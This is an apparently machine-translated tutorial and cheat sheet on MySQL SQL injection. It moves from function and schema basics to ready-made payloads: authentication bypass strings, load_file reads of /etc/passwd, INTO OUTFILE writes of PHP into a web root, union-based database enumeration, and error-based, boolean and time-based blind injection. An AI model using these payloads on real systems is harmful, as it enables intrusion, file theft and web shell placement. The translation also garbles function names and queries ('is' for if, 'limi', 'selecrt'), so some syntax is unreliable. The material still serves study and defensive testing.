Basic knowledge of SQL injection and basic knowledge of SQL Injection
What is SQL Injection)
The so-called SQL injection attack means that an attacker inserts an SQL command into the input field of a Web form or the query string requested by the page, and deceives the server to execute malicious SQL commands. In some forms, the content entered by users is directly used to construct (or affect) dynamic SQL commands or as input parameters of stored procedures. Such forms are particularly vulnerable to SQL injection attacks.
Mysql comments
#
-- [Space] Or -- +
/*... */
During attention, these annotations may all require urlencode.
Mysql Authentication Bypass
; % 00
'Or 1 = 1 #
'/*! Or */1 = 1 -- +
Mysql Connector
Use + to connect to mysql.
select * from users where username='zhangsan' and "ab"="a"+"b";
Common functions in mysql
Mysql built-in functions are used during SQL injection. Built-in functions include functions to obtain information and function functions.
The information function is used to obtain information about the mysql database. The function is a traditional function used to complete an operation.
Common Information functions include:
database()
Used to obtain information about the currently used database
version():
Returns the database version, which is equivalent@@version
user():
Returns the current user, which is equivalent to the current_user parameter. For example:
select user(); #root@localhostselect current_user; #root@localhost
@@datadir
To obtain the storage location of the database.
select @@datadir; #D:\xampp\mysql\data\
Common functions include:
load_file():
Load files from the computer and read the data in the files.
Select * from users union select 1, load_file ('/etc/passwd'), 3; select * from users union select 1, load_file (0x2F6574632F706173737764), 3; # Use hexadecimal notation to bypass single quotes
into outfile:
Write files only if you have the write permission.
select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';
concat():
Returns the string generated by the connection parameter. If one of the parameters is null, the return value is null.
The usage is as follows:
select concat(username,password)from users;
*concat_ws()
: Yesconcat_ws()
The first parameter is the delimiter, and the remaining parameter is the field name.
select concat_ws(',',username,password) from users;
group_concat()
: Used to merge results from multiple records.
The usage is as follows:
Select group_concat (username) from users; # All usernames in the users table are returned and returned as a record.
subtring()
,substr():
Used to truncate a string. Usage:substr(str,pos,length)
Note that pos starts from 1.
select substr((select database()),1,1);
ascii():
Returns the ascii value of a character.
select ascii('a'); #97
length():
Returns the length of a string.
For example:
Select length ("123456") # returns 6
is(exp1,exp2,exp2):
If the exp1 expression is True, exp2 is returned; otherwise, exp3 is returned.
For example:
select 1,2,if(1=1,3,-1) #1,2,3selecrt 1,2,if(1=2,3,-1) #1,2,-1
The preceding functions are commonly used in SQL injection projects. Of course, some functions are not used.
now():
Returns the current system time.
hex():
Returns the hexadecimal string.
unhex():
Hex () in hexadecimal notation
@@basedir():
Reverse mysql installation directory
@@versin_compile_os:
Operating System
Mysql database metadata
Exist in mysqlinformation_schema
It is an information database that stores information about all other databases stored by the Mysql server, such as the database name, database table, and table field name.
And access permissions. Ininforma_schema
Commonly used tables include:
Schemata: Stores all the database information in mysql. The returned results are the same as those of show databases.
Tables: Stores information about tables in the database. Describes in detail the schema, table type, and table engine of a table.
ShowThe result of tables from secuiry is from this table.
Columns: Describes in detail all the columns of a table and the information of each column.
Show columns from usersThe result is from this table.
The following describes how to use the preceding three tables to obtain database information.
Select database (); # query the selected database select schema_name from information_schema.schemata limit # query the database select table_name from information_schema.tables where table_schema = database () limit; # query table select column_name from information_schema.columns where table_name = 'users' limit; # query Columns
SQL Injection Type
The SQL injection types can be roughly divided into conventional SQL injection and SQL blind injection. SQL blind injection can be divided into time-based blind injection and Web Content-Based Blind injection.
There are a lot of instructions on SQL blind injection on the Internet, and I will not explain it too much here. The concept of blind injection can be easily described with specific examples.
In latency injection, common functions are included.if()
Andsleep()
Function.
The basic SQL expression is as follows:
select * from users where id=1 and if(length(user())=14,sleep(3),1);select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);
Wide byte Injection
For details about width byte injection, refer to width byte injection. The wide-byte input is generally caused by the mismatch between the webpage encoding and the database encoding. For wide byte injection, use % d5 or % df to bypass
Summary of common mysql statements
Regular Injection
1 'order by num # determine the field length 1' union select 1, 2, 3 # determine the field length-1' union select 1, 2, 3 # determine the fields displayed on the page-1 'Union select 1, 2, group_concat (schema_name) from information_schema.schemata # display all databases in mysql-1 'Union select 1, 2 group_concat (table_name) from information_schema.tables where table_schame = "dbname"/database ()/hex (dbname) #-1 'Union select 1, 2, column_name from information_schema.columns where table_name = "table_name" limit #-1 'Union select, group_concat (column_name) from information_schema.columns where table_name = "table_name"/hex (table_name) limit #-1 'Union select, 3 AND '1' = '1 when the annotator cannot be used
Double SQL query and selection
Select concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a); select count (*), concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group by a; select concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables; select count (*), concat (0x3a, 0x3a, (select database (), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group A; # This SQL statement is commonly used for SQL blind injection. Obtain the database information such as select count (*), concat (0x3a, 0x3a, (select table_name from information_schema.table where table_schema = database () limi), 0x3a, 0x3a, floor (rand () * 2) a from information_schema.tables group by a; # obtain the information of the database table # use the following posture: 1' AND (select 1 from (select count (*), concat (0x3a, 0x3a, (select table_name from information_schema.table where table_schema = database () limi 0, 1), 0x3a, 0x3a, floor (rand () * 2 )) a from information_schema.tables group by a) B) -- +
This posture is used to obtain the required information through the error message when mysql executes the SQL command. In the following article, we will analyze this method in detail.
Bool blind Injection
1' and ascii(substr(select database(),1,1))>991' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90
Bool blind injection is used to obtain information based on the page content corresponding to True or False returned values of SQL statements.
Time blind Injection
1' AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) +1' AND select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+
Both of the above two statements are equivalent, and the time blind injection is different from the conventional SQL injection methods. Time blind injection needs to be generally usedif()
Andsleep()
Function. Then, based on the length of the content returned by the pagesleep()
Whether the function is executed.
Accordingsleep()
Whether the function is executed to obtain the required information.
Summary
The above is the basic knowledge necessary for SQL injection. The next article will explain the knowledge in SQL Injection in detail through examples. Today's article is also a basic knowledge. If you are interested in SQL injection, please stay tuned to the help house.